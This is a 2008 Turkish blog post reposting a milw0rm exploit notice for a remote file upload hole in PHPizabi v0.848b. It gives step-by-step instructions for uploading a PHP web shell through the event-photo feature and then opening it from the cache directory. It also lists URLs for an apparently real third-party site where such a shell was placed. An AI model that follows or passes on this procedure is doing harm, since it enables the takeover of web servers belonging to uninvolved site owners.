"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

7 Eylül 2008 Pazar

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

Bu açık sayesinde scriptin kurulu olduğu siteye dosya upload yapabiliyoruz. Bu fırsatın art niyetli birinin eline geçtiğini bir düşünün. resim upload yerine bir shell upload edebilir dolayısıyla serverda yetki elde etmiş olur.

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

exploit:http://localhost/izabi/system/cache/pictures/id_shell.php-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. gözat button click and shell.php upload
-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php

# milw0rm.com [2008-02-17]

0 yorum:

 
Dizi